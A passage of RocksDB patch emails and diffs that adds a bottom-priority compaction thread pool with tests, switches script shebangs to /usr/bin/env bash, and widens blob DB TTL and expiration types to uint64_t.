Env::Priority::BOTTOM); + bg_bottom_compaction_scheduled_--; + } versions_->GetColumnFamilySet()->FreeDeadColumnFamilies(); // See if there's more work to be done MaybeScheduleFlushOrCompaction(); - if (made_progress || 
bg_compaction_scheduled_ == 0 || + if (made_progress || + (bg_compaction_scheduled_ == 0 && + bg_bottom_compaction_scheduled_ == 0) || HasPendingManualCompaction()) { // signal if // * made_progress -- need to wakeup DelayWrite - // * bg_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl + // * bg_{bottom,}_compaction_scheduled_ == 0 -- need to wakeup ~DBImpl // * HasPendingManualCompaction -- need to wakeup RunManualCompaction // If none of this is true, there is no need to signal since nobody is // waiting for it @@ -1386,14 +1418,23 @@ void DBImpl::BackgroundCallCompaction(void* arg) { Status DBImpl::BackgroundCompaction(bool* made_progress, JobContext* job_context, - LogBuffer* log_buffer, void* arg) { - ManualCompaction* manual_compaction = - reinterpret_cast(arg); + LogBuffer* log_buffer, + PrepickedCompaction* prepicked_compaction) { + ManualCompactionState* manual_compaction = + prepicked_compaction == nullptr + ? nullptr + : prepicked_compaction->manual_compaction_state; *made_progress = false; mutex_.AssertHeld(); TEST_SYNC_POINT("DBImpl::BackgroundCompaction:Start"); bool is_manual = (manual_compaction != nullptr); + unique_ptr c; + if (prepicked_compaction != nullptr && + prepicked_compaction->compaction != nullptr) { + c.reset(prepicked_compaction->compaction); + } + bool is_prepicked = is_manual || c; // (manual_compaction->in_progress == false); bool trivial_move_disallowed = @@ -1410,7 +1451,6 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, manual_compaction->status = status; manual_compaction->done = true; manual_compaction->in_progress = false; - delete manual_compaction->compaction; manual_compaction = nullptr; } return status; @@ -1421,13 +1461,11 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, manual_compaction->in_progress = true; } - unique_ptr c; // InternalKey manual_end_storage; // InternalKey* manual_end = &manual_end_storage; if (is_manual) { - ManualCompaction* m = manual_compaction; + ManualCompactionState* m = manual_compaction; assert(m->in_progress); - c.reset(std::move(m->compaction)); if (!c) { m->done = true; m->manual_end = nullptr; @@ -1449,7 +1487,7 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, ? "(end)" : m->manual_end->DebugString().c_str())); } - } else if (!compaction_queue_.empty()) { + } else if (!is_prepicked && !compaction_queue_.empty()) { if (HaveManualCompaction(compaction_queue_.front())) { // Can't compact right now, but try again later TEST_SYNC_POINT("DBImpl::BackgroundCompaction()::Conflict"); @@ -1601,6 +1639,28 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, // Clear Instrument ThreadStatusUtil::ResetThreadStatus(); + } else if (c->column_family_data()->ioptions()->compaction_style == + kCompactionStyleUniversal && + !is_prepicked && c->output_level() > 0 && + c->output_level() == + c->column_family_data() + ->current() + ->storage_info() + ->MaxOutputLevel( + immutable_db_options_.allow_ingest_behind) && + env_->GetBackgroundThreads(Env::Priority::BOTTOM) > 0) { + // Forward universal compactions involving last level to the bottom pool + // if it exists, such that long-running compactions can't block short- + // lived ones, like L0->L0s. 
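As the comment above notes, the point of the BOTTOM pool is to keep long full compactions from starving short L0->L0 work. One operational consequence is worth spelling out: the pool defaults to zero threads (hence the `env_->GetBackgroundThreads(Env::Priority::BOTTOM) > 0` guard), so an application has to size it explicitly to opt in. A minimal usage sketch under that assumption; the path and thread count are placeholders:

```
#include <cassert>
#include "rocksdb/db.h"
#include "rocksdb/env.h"
#include "rocksdb/options.h"

int main() {
  // Reserve one thread for compactions that end at the bottommost level;
  // shorter compactions continue to run on the LOW pool.
  rocksdb::Env::Default()->SetBackgroundThreads(1,
                                                rocksdb::Env::Priority::BOTTOM);

  rocksdb::Options options;
  options.create_if_missing = true;
  options.compaction_style = rocksdb::kCompactionStyleUniversal;

  rocksdb::DB* db = nullptr;
  rocksdb::Status s = rocksdb::DB::Open(options, "/tmp/universal_db", &db);
  assert(s.ok());
  // ... normal writes; qualifying full compactions are re-scheduled onto the
  // BOTTOM pool by the branch that continues below ...
  delete db;
  return 0;
}
```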
+ TEST_SYNC_POINT("DBImpl::BackgroundCompaction:ForwardToBottomPriPool"); + CompactionArg* ca = new CompactionArg; + ca->db = this; + ca->prepicked_compaction = new PrepickedCompaction; + ca->prepicked_compaction->compaction = c.release(); + ca->prepicked_compaction->manual_compaction_state = nullptr; + ++bg_bottom_compaction_scheduled_; + env_->Schedule(&DBImpl::BGWorkBottomCompaction, ca, Env::Priority::BOTTOM, + this, &DBImpl::UnscheduleCallback); } else { int output_level __attribute__((unused)) = c->output_level(); TEST_SYNC_POINT_CALLBACK("DBImpl::BackgroundCompaction:NonTrivial", @@ -1664,7 +1724,7 @@ Status DBImpl::BackgroundCompaction(bool* made_progress, } if (is_manual) { - ManualCompaction* m = manual_compaction; + ManualCompactionState* m = manual_compaction; if (!status.ok()) { m->status = status; m->done = true; @@ -1707,13 +1767,13 @@ bool DBImpl::HasPendingManualCompaction() { return (!manual_compaction_dequeue_.empty()); } -void DBImpl::AddManualCompaction(DBImpl::ManualCompaction* m) { +void DBImpl::AddManualCompaction(DBImpl::ManualCompactionState* m) { manual_compaction_dequeue_.push_back(m); } -void DBImpl::RemoveManualCompaction(DBImpl::ManualCompaction* m) { +void DBImpl::RemoveManualCompaction(DBImpl::ManualCompactionState* m) { // Remove from queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if (m == (*it)) { @@ -1726,16 +1786,17 @@ void DBImpl::RemoveManualCompaction(DBImpl::ManualCompaction* m) { return; } -bool DBImpl::ShouldntRunManualCompaction(ManualCompaction* m) { +bool DBImpl::ShouldntRunManualCompaction(ManualCompactionState* m) { if (num_running_ingest_file_ > 0) { // We need to wait for other IngestExternalFile() calls to finish // before running a manual compaction. return true; } if (m->exclusive) { - return (bg_compaction_scheduled_ > 0); + return (bg_bottom_compaction_scheduled_ > 0 || + bg_compaction_scheduled_ > 0); } - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); bool seen = false; while (it != manual_compaction_dequeue_.end()) { @@ -1756,7 +1817,7 @@ bool DBImpl::ShouldntRunManualCompaction(ManualCompaction* m) { bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) { // Remove from priority queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if ((*it)->exclusive) { @@ -1774,7 +1835,7 @@ bool DBImpl::HaveManualCompaction(ColumnFamilyData* cfd) { bool DBImpl::HasExclusiveManualCompaction() { // Remove from priority queue - std::deque::iterator it = + std::deque::iterator it = manual_compaction_dequeue_.begin(); while (it != manual_compaction_dequeue_.end()) { if ((*it)->exclusive) { @@ -1785,7 +1846,7 @@ bool DBImpl::HasExclusiveManualCompaction() { return false; } -bool DBImpl::MCOverlap(ManualCompaction* m, ManualCompaction* m1) { +bool DBImpl::MCOverlap(ManualCompactionState* m, ManualCompactionState* m1) { if ((m->exclusive) || (m1->exclusive)) { return true; } diff --git a/db/db_impl_debug.cc b/db/db_impl_debug.cc index 9f4fccabc42..de5b66f2a6c 100644 --- a/db/db_impl_debug.cc +++ b/db/db_impl_debug.cc @@ -112,7 +112,9 @@ Status DBImpl::TEST_WaitForCompact() { // OR flush to finish. 
InstrumentedMutexLock l(&mutex_); - while ((bg_compaction_scheduled_ || bg_flush_scheduled_) && bg_error_.ok()) { + while ((bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_) && + bg_error_.ok()) { bg_cv_.Wait(); } return bg_error_; diff --git a/db/db_universal_compaction_test.cc b/db/db_universal_compaction_test.cc index c6334f8e067..ca7ebac8ecd 100644 --- a/db/db_universal_compaction_test.cc +++ b/db/db_universal_compaction_test.cc @@ -1370,6 +1370,103 @@ TEST_P(DBTestUniversalCompaction, UniversalCompactionSecondPathRatio) { Destroy(options); } +TEST_P(DBTestUniversalCompaction, FullCompactionInBottomPriThreadPool) { + const int kNumFilesTrigger = 3; + Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM); + for (bool allow_ingest_behind : {false, true}) { + Options options = CurrentOptions(); + options.allow_ingest_behind = allow_ingest_behind; + options.compaction_style = kCompactionStyleUniversal; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + options.target_file_size_base = 32 << 10; // 32KB + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + // Trigger compaction if size amplification exceeds 110% + options.compaction_options_universal.max_size_amplification_percent = 110; + DestroyAndReopen(options); + + int num_bottom_pri_compactions = 0; + SyncPoint::GetInstance()->SetCallBack( + "DBImpl::BGWorkBottomCompaction", + [&](void* arg) { ++num_bottom_pri_compactions; }); + SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int num = 0; num < kNumFilesTrigger; num++) { + ASSERT_EQ(NumSortedRuns(), num); + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx); + } + dbfull()->TEST_WaitForCompact(); + + if (allow_ingest_behind || num_levels_ > 1) { + // allow_ingest_behind increases number of levels while sanitizing. + ASSERT_EQ(1, num_bottom_pri_compactions); + } else { + // for single-level universal, everything's bottom level so nothing should + // be executed in bottom-pri thread pool. + ASSERT_EQ(0, num_bottom_pri_compactions); + } + // Verify that size amplification did occur + ASSERT_EQ(NumSortedRuns(), 1); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); + } +} + +TEST_P(DBTestUniversalCompaction, ConcurrentBottomPriLowPriCompactions) { + if (num_levels_ == 1) { + // for single-level universal, everything's bottom level so nothing should + // be executed in bottom-pri thread pool. + return; + } + const int kNumFilesTrigger = 3; + Env::Default()->SetBackgroundThreads(1, Env::Priority::BOTTOM); + Options options = CurrentOptions(); + options.compaction_style = kCompactionStyleUniversal; + options.num_levels = num_levels_; + options.write_buffer_size = 100 << 10; // 100KB + options.target_file_size_base = 32 << 10; // 32KB + options.level0_file_num_compaction_trigger = kNumFilesTrigger; + // Trigger compaction if size amplification exceeds 110% + options.compaction_options_universal.max_size_amplification_percent = 110; + DestroyAndReopen(options); + + rocksdb::SyncPoint::GetInstance()->LoadDependency( + {// wait for the full compaction to be picked before adding files intended + // for the second one. + {"DBImpl::BackgroundCompaction:ForwardToBottomPriPool", + "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"}, + // the full (bottom-pri) compaction waits until a partial (low-pri) + // compaction has started to verify they can run in parallel. 
+ {"DBImpl::BackgroundCompaction:NonTrivial", + "DBImpl::BGWorkBottomCompaction"}}); + SyncPoint::GetInstance()->EnableProcessing(); + + Random rnd(301); + for (int i = 0; i < 2; ++i) { + for (int num = 0; num < kNumFilesTrigger; num++) { + int key_idx = 0; + GenerateNewFile(&rnd, &key_idx, true /* no_wait */); + // use no_wait above because that one waits for flush and compaction. We + // don't want to wait for compaction because the full compaction is + // intentionally blocked while more files are flushed. + dbfull()->TEST_WaitForFlushMemTable(); + } + if (i == 0) { + TEST_SYNC_POINT( + "DBTestUniversalCompaction:ConcurrentBottomPriLowPriCompactions:0"); + } + } + dbfull()->TEST_WaitForCompact(); + + // First compaction should output to bottom level. Second should output to L0 + // since older L0 files pending compaction prevent it from being placed lower. + ASSERT_EQ(NumSortedRuns(), 2); + ASSERT_GT(NumTableFilesAtLevel(0), 0); + ASSERT_GT(NumTableFilesAtLevel(num_levels_ - 1), 0); + rocksdb::SyncPoint::GetInstance()->DisableProcessing(); +} + INSTANTIATE_TEST_CASE_P(UniversalCompactionNumLevels, DBTestUniversalCompaction, ::testing::Combine(::testing::Values(1, 3, 5), ::testing::Bool())); diff --git a/db/version_set.cc b/db/version_set.cc index f8465027bb5..6b9611aa9bd 100644 --- a/db/version_set.cc +++ b/db/version_set.cc @@ -1227,6 +1227,14 @@ int VersionStorageInfo::MaxInputLevel() const { return 0; } +int VersionStorageInfo::MaxOutputLevel(bool allow_ingest_behind) const { + if (allow_ingest_behind) { + assert(num_levels() > 1); + return num_levels() - 2; + } + return num_levels() - 1; +} + void VersionStorageInfo::EstimateCompactionBytesNeeded( const MutableCFOptions& mutable_cf_options) { // Only implemented for level-based compaction diff --git a/db/version_set.h b/db/version_set.h index 5a1f8d07d64..9fb000c058b 100644 --- a/db/version_set.h +++ b/db/version_set.h @@ -147,6 +147,7 @@ class VersionStorageInfo { } int MaxInputLevel() const; + int MaxOutputLevel(bool allow_ingest_behind) const; // Return level number that has idx'th highest score int CompactionScoreLevel(int idx) const { return compaction_level_[idx]; } diff --git a/env/env_posix.cc b/env/env_posix.cc index 7f2bc3b85dd..5a671d72fe4 100644 --- a/env/env_posix.cc +++ b/env/env_posix.cc @@ -761,23 +761,23 @@ class PosixEnv : public Env { // Allow increasing the number of worker threads. virtual void SetBackgroundThreads(int num, Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].SetBackgroundThreads(num); } virtual int GetBackgroundThreads(Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); return thread_pools_[pri].GetBackgroundThreads(); } // Allow increasing the number of worker threads. 
virtual void IncBackgroundThreadsIfNeeded(int num, Priority pri) override { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].IncBackgroundThreadsIfNeeded(num); } virtual void LowerThreadPoolIOPriority(Priority pool = LOW) override { - assert(pool >= Priority::LOW && pool <= Priority::HIGH); + assert(pool >= Priority::BOTTOM && pool <= Priority::HIGH); #ifdef OS_LINUX thread_pools_[pool].LowerIOPriority(); #endif @@ -883,7 +883,7 @@ PosixEnv::PosixEnv() void PosixEnv::Schedule(void (*function)(void* arg1), void* arg, Priority pri, void* tag, void (*unschedFunction)(void* arg)) { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); thread_pools_[pri].Schedule(function, arg, tag, unschedFunction); } @@ -892,7 +892,7 @@ int PosixEnv::UnSchedule(void* arg, Priority pri) { } unsigned int PosixEnv::GetThreadPoolQueueLen(Priority pri) const { - assert(pri >= Priority::LOW && pri <= Priority::HIGH); + assert(pri >= Priority::BOTTOM && pri <= Priority::HIGH); return thread_pools_[pri].GetQueueLen(); } diff --git a/env/env_test.cc b/env/env_test.cc index 7fd71a3c430..9ec2f142ed8 100644 --- a/env/env_test.cc +++ b/env/env_test.cc @@ -125,12 +125,14 @@ static void SetBool(void* ptr) { reinterpret_cast*>(ptr)->store(true); } -TEST_P(EnvPosixTestWithParam, RunImmediately) { - std::atomic called(false); - env_->Schedule(&SetBool, &called); - Env::Default()->SleepForMicroseconds(kDelayMicros); - ASSERT_TRUE(called.load()); - WaitThreadPoolsEmpty(); +TEST_F(EnvPosixTest, RunImmediately) { + for (int pri = Env::BOTTOM; pri < Env::TOTAL; ++pri) { + std::atomic called(false); + env_->SetBackgroundThreads(1, static_cast(pri)); + env_->Schedule(&SetBool, &called, static_cast(pri)); + Env::Default()->SleepForMicroseconds(kDelayMicros); + ASSERT_TRUE(called.load()); + } } TEST_P(EnvPosixTestWithParam, UnSchedule) { diff --git a/include/rocksdb/env.h b/include/rocksdb/env.h index 8690738998f..e2efbdc15fd 100644 --- a/include/rocksdb/env.h +++ b/include/rocksdb/env.h @@ -283,7 +283,7 @@ class Env { virtual Status UnlockFile(FileLock* lock) = 0; // Priority for scheduling job in thread pool - enum Priority { LOW, HIGH, TOTAL }; + enum Priority { BOTTOM, LOW, HIGH, TOTAL }; // Priority for requesting bytes in rate limiter scheduler enum IOPriority { diff --git a/memtable/inlineskiplist_test.cc b/memtable/inlineskiplist_test.cc index 46d6c0fa988..5803e5b0f55 100644 --- a/memtable/inlineskiplist_test.cc +++ b/memtable/inlineskiplist_test.cc @@ -571,6 +571,7 @@ static void RunConcurrentRead(int run) { fprintf(stderr, "Run %d of %d\n", i, N); } TestState state(seed + 1); + Env::Default()->SetBackgroundThreads(1); Env::Default()->Schedule(ConcurrentReader, &state); state.Wait(TestState::RUNNING); for (int k = 0; k < kSize; ++k) { diff --git a/memtable/skiplist_test.cc b/memtable/skiplist_test.cc index 2f4af17885e..50c3588bb86 100644 --- a/memtable/skiplist_test.cc +++ b/memtable/skiplist_test.cc @@ -363,6 +363,7 @@ static void RunConcurrent(int run) { fprintf(stderr, "Run %d of %d\n", i, N); } TestState state(seed + 1); + Env::Default()->SetBackgroundThreads(1); Env::Default()->Schedule(ConcurrentReader, &state); state.Wait(TestState::RUNNING); for (int k = 0; k < kSize; k++) { diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index f0221625947..6dfff771fc5 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -318,6 +318,10 @@ 
DEFINE_int32(max_background_jobs, "The maximum number of concurrent background jobs that can occur " "in parallel."); +DEFINE_int32(num_bottom_pri_threads, 0, + "The number of threads in the bottom-priority thread pool (used " + "by universal compaction only)."); + DEFINE_int32(max_background_compactions, rocksdb::Options().max_background_compactions, "The maximum number of concurrent background compactions" @@ -5242,6 +5246,8 @@ int db_bench_tool(int argc, char** argv) { FLAGS_env->SetBackgroundThreads(FLAGS_max_background_compactions); FLAGS_env->SetBackgroundThreads(FLAGS_max_background_flushes, rocksdb::Env::Priority::HIGH); + FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads, + rocksdb::Env::Priority::BOTTOM); // Choose a location for the test database if none given with --db= if (FLAGS_db.empty()) { diff --git a/util/threadpool_imp.cc b/util/threadpool_imp.cc index aa40ab9cd4c..f38e6422b46 100644 --- a/util/threadpool_imp.cc +++ b/util/threadpool_imp.cc @@ -123,11 +123,11 @@ struct ThreadPoolImpl::Impl { inline ThreadPoolImpl::Impl::Impl() - : + : low_io_priority_(false), priority_(Env::LOW), env_(nullptr), - total_threads_limit_(1), + total_threads_limit_(0), queue_len_(), exit_all_threads_(false), wait_for_jobs_to_complete_(false), @@ -372,7 +372,7 @@ int ThreadPoolImpl::Impl::UnSchedule(void* arg) { return count; } -ThreadPoolImpl::ThreadPoolImpl() : +ThreadPoolImpl::ThreadPoolImpl() : impl_(new Impl()) { } From 5883a1ae24b790e52bf86011f33924e78250564d Mon Sep 17 00:00:00 2001 From: Alan Somers Date: Thu, 3 Aug 2017 15:43:05 -0700 Subject: [PATCH 074/205] Fix /bin/bash shebangs Summary: "/bin/bash" is a Linuxism. "/usr/bin/env bash" is portable. Closes https://github.com/facebook/rocksdb/pull/2646 Differential Revision: D5556259 Pulled By: ajkr fbshipit-source-id: cbffd38ecdbfffb2438969ec007ab345ed893ccb --- buckifier/rocks_test_runner.sh | 2 +- build_tools/cont_integration.sh | 2 +- build_tools/dockerbuild.sh | 2 +- build_tools/format-diff.sh | 2 +- build_tools/regression_build_test.sh | 2 +- build_tools/rocksdb-lego-determinator | 2 +- coverage/coverage_test.sh | 2 +- tools/benchmark.sh | 2 +- tools/benchmark_leveldb.sh | 2 +- tools/check_format_compatible.sh | 2 +- tools/dbench_monitor | 2 +- tools/generate_random_db.sh | 2 +- tools/pflag | 2 +- tools/rdb/rdb | 2 +- tools/regression_test.sh | 2 +- tools/run_flash_bench.sh | 2 +- tools/run_leveldb.sh | 2 +- tools/verify_random_db.sh | 2 +- 18 files changed, 18 insertions(+), 18 deletions(-) diff --git a/buckifier/rocks_test_runner.sh b/buckifier/rocks_test_runner.sh index 2ee216934d7..e1f48a760d3 100755 --- a/buckifier/rocks_test_runner.sh +++ b/buckifier/rocks_test_runner.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # Create a tmp directory for the test to use TEST_DIR=$(mktemp -d /dev/shm/fbcode_rocksdb_XXXXXXX) TEST_TMPDIR="$TEST_DIR" $@ && rm -rf "$TEST_DIR" diff --git a/build_tools/cont_integration.sh b/build_tools/cont_integration.sh index 4e1905e7e31..06f25c596e4 100755 --- a/build_tools/cont_integration.sh +++ b/build_tools/cont_integration.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # Copyright (c) 2016, Facebook. All rights reserved. 
# diff --git a/build_tools/dockerbuild.sh b/build_tools/dockerbuild.sh index 2685380bf13..02f60944286 100755 --- a/build_tools/dockerbuild.sh +++ b/build_tools/dockerbuild.sh @@ -1,2 +1,2 @@ -#!/bin/bash +#!/usr/bin/env bash docker run -v $PWD:/rocks -w /rocks buildpack-deps make diff --git a/build_tools/format-diff.sh b/build_tools/format-diff.sh index 868452a92ab..81221ed9a49 100755 --- a/build_tools/format-diff.sh +++ b/build_tools/format-diff.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # If clang_format_diff.py command is not specfied, we assume we are able to # access directly without any path. if [ -z $CLANG_FORMAT_DIFF ] diff --git a/build_tools/regression_build_test.sh b/build_tools/regression_build_test.sh index 76589882106..6980633287c 100755 --- a/build_tools/regression_build_test.sh +++ b/build_tools/regression_build_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash set -e diff --git a/build_tools/rocksdb-lego-determinator b/build_tools/rocksdb-lego-determinator index 09e79f376a8..300a60aab95 100755 --- a/build_tools/rocksdb-lego-determinator +++ b/build_tools/rocksdb-lego-determinator @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # This script is executed by Sandcastle # to determine next steps to run diff --git a/coverage/coverage_test.sh b/coverage/coverage_test.sh index 4d8052c9e4f..6d87ae90867 100755 --- a/coverage/coverage_test.sh +++ b/coverage/coverage_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # Exit on error. set -e diff --git a/tools/benchmark.sh b/tools/benchmark.sh index 46e1c6567dd..1a2c38439cf 100755 --- a/tools/benchmark.sh +++ b/tools/benchmark.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: db_bench binary exists in the current directory if [ $# -ne 1 ]; then diff --git a/tools/benchmark_leveldb.sh b/tools/benchmark_leveldb.sh index dce66d47adf..7769969809f 100755 --- a/tools/benchmark_leveldb.sh +++ b/tools/benchmark_leveldb.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: db_bench binary exists in the current directory # # This should be used with the LevelDB fork listed here to use additional test options. diff --git a/tools/check_format_compatible.sh b/tools/check_format_compatible.sh index 2f3805e5ab2..801648963ec 100755 --- a/tools/check_format_compatible.sh +++ b/tools/check_format_compatible.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to load some pre generated data file to a DB using ldb tool # ./ldb needs to be avaible to be executed. diff --git a/tools/dbench_monitor b/tools/dbench_monitor index 10726dc2324..d85f9d070c0 100755 --- a/tools/dbench_monitor +++ b/tools/dbench_monitor @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # #(c) 2004-present, Facebook Inc. All rights reserved. # diff --git a/tools/generate_random_db.sh b/tools/generate_random_db.sh index 28bdceb2baa..e10843bab88 100755 --- a/tools/generate_random_db.sh +++ b/tools/generate_random_db.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to load some pre generated data file to a DB using ldb tool # ./ldb needs to be avaible to be executed. diff --git a/tools/pflag b/tools/pflag index adfac23bc9f..f3394a66649 100755 --- a/tools/pflag +++ b/tools/pflag @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # #(c) 2004-present, Facebook, all rights reserved. # See the LICENSE file for usage and distribution rights. 
diff --git a/tools/rdb/rdb b/tools/rdb/rdb index 82cd17fb7ec..05da1158b8d 100755 --- a/tools/rdb/rdb +++ b/tools/rdb/rdb @@ -1,3 +1,3 @@ -#!/bin/bash +#!/usr/bin/env bash node -e "RDB = require('./build/Release/rdb').DBWrapper; console.log('Loaded rocksdb in variable RDB'); repl = require('repl').start('> ');" diff --git a/tools/regression_test.sh b/tools/regression_test.sh index 7801da14f00..58558bbe4af 100755 --- a/tools/regression_test.sh +++ b/tools/regression_test.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # The RocksDB regression test script. # REQUIREMENT: must be able to run make db_bench in the current directory # diff --git a/tools/run_flash_bench.sh b/tools/run_flash_bench.sh index 76c16bb5955..4d9d0d55750 100755 --- a/tools/run_flash_bench.sh +++ b/tools/run_flash_bench.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: benchmark.sh exists in the current directory # After execution of this script, log files are generated in $output_dir. # report.txt provides a high level statistics diff --git a/tools/run_leveldb.sh b/tools/run_leveldb.sh index 884312e3db6..de628c310ca 100755 --- a/tools/run_leveldb.sh +++ b/tools/run_leveldb.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # REQUIRE: benchmark_leveldb.sh exists in the current directory # After execution of this script, log files are generated in $output_dir. # report.txt provides a high level statistics diff --git a/tools/verify_random_db.sh b/tools/verify_random_db.sh index 8ff6a3fd18d..7000f5a1aa9 100755 --- a/tools/verify_random_db.sh +++ b/tools/verify_random_db.sh @@ -1,4 +1,4 @@ -#!/bin/bash +#!/usr/bin/env bash # # A shell script to verify DB generated by generate_random_db.sh cannot opened and read correct data. # ./ldb needs to be avaible to be executed. From 92afe830f91a3c8e507f2cbffae379a369c59da2 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 17:46:00 -0700 Subject: [PATCH 075/205] Update all blob db TTL and timestamps to uint64_t Summary: The current blob db implementation uses a mix of int32_t, uint32_t and uint64_t for TTL and expiration. Update all timestamps to uint64_t for consistency. Closes https://github.com/facebook/rocksdb/pull/2683 Differential Revision: D5557103 Pulled By: yiwu-arbug fbshipit-source-id: e4eab2691629a755e614e8cf1eed9c3a681d0c42 --- utilities/blob_db/blob_db.h | 14 ++--- utilities/blob_db/blob_db_impl.cc | 82 ++++++++++++++-------------- utilities/blob_db/blob_db_impl.h | 17 +++--- utilities/blob_db/blob_db_test.cc | 10 ++-- utilities/blob_db/blob_dump_tool.cc | 14 ++--- utilities/blob_db/blob_file.cc | 4 +- utilities/blob_db/blob_log_format.cc | 30 +++++----- utilities/blob_db/blob_log_format.h | 33 ++++++----- utilities/blob_db/blob_log_writer.cc | 18 +++--- utilities/blob_db/blob_log_writer.h | 4 +- 10 files changed, 112 insertions(+), 114 deletions(-) diff --git a/utilities/blob_db/blob_db.h b/utilities/blob_db/blob_db.h index b645ea6efdd..8d6725f60e0 100644 --- a/utilities/blob_db/blob_db.h +++ b/utilities/blob_db/blob_db.h @@ -50,7 +50,7 @@ struct BlobDBOptions { // first bucket is 1471542000 - 1471542600 // second bucket is 1471542600 - 1471543200 // and so on - uint32_t ttl_range_secs = 3600; + uint64_t ttl_range_secs = 3600; // at what bytes will the blob files be synced to blob log.
uint64_t bytes_per_sync = 0; @@ -97,21 +97,21 @@ class BlobDB : public StackableDB { virtual Status PutWithTTL(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t ttl) = 0; + const Slice& value, uint64_t ttl) = 0; virtual Status PutWithTTL(const WriteOptions& options, const Slice& key, - const Slice& value, int32_t ttl) { + const Slice& value, uint64_t ttl) { return PutWithTTL(options, DefaultColumnFamily(), key, value, ttl); } - // Put with expiration. Key with expiration time equal to -1 - // means the key don't expire. + // Put with expiration. Key with expiration time equal to + // std::numeric_limits::max() means the key don't expire. virtual Status PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, - const Slice& value, int32_t expiration) = 0; + const Slice& value, uint64_t expiration) = 0; virtual Status PutUntil(const WriteOptions& options, const Slice& key, - const Slice& value, int32_t expiration) { + const Slice& value, uint64_t expiration) { return PutUntil(options, DefaultColumnFamily(), key, value, expiration); } diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 1afdc94a06e..f35bc4ac3f5 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -37,7 +37,7 @@ namespace { int kBlockBasedTableVersionFormat = 2; -void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint32_t ttl) { +void extendTTL(rocksdb::blob_db::ttlrange_t* ttl_range, uint64_t ttl) { ttl_range->first = std::min(ttl_range->first, ttl); ttl_range->second = std::max(ttl_range->second, ttl); } @@ -489,9 +489,8 @@ Status BlobDBImpl::OpenAllFiles() { ttl_range.first + (uint32_t)bdb_options_.ttl_range_secs); bfptr->set_ttl_range(ttl_range); - std::time_t epoch_now = std::chrono::system_clock::to_time_t( - std::chrono::system_clock::now()); - if (ttl_range.second < epoch_now) { + uint64_t now = EpochNow(); + if (ttl_range.second < now) { Status fstatus = CreateWriterLocked(bfptr); if (fstatus.ok()) fstatus = bfptr->WriteFooterAndCloseLocked(); if (!fstatus.ok()) { @@ -503,7 +502,7 @@ Status BlobDBImpl::OpenAllFiles() { } else { ROCKS_LOG_ERROR(db_options_.info_log, "Blob File Closed: %s now: %d ttl_range: (%d, %d)", - bfpath.c_str(), epoch_now, ttl_range.first, + bfpath.c_str(), now, ttl_range.first, ttl_range.second); } } else { @@ -591,7 +590,7 @@ Status BlobDBImpl::CreateWriterLocked(const std::shared_ptr& bfile) { } std::shared_ptr BlobDBImpl::FindBlobFileLocked( - uint32_t expiration) const { + uint64_t expiration) const { if (open_blob_files_.empty()) return nullptr; std::shared_ptr tmp = std::make_shared(); @@ -684,7 +683,8 @@ std::shared_ptr BlobDBImpl::SelectBlobFile() { return bfile; } -std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint32_t expiration) { +std::shared_ptr BlobDBImpl::SelectBlobFileTTL(uint64_t 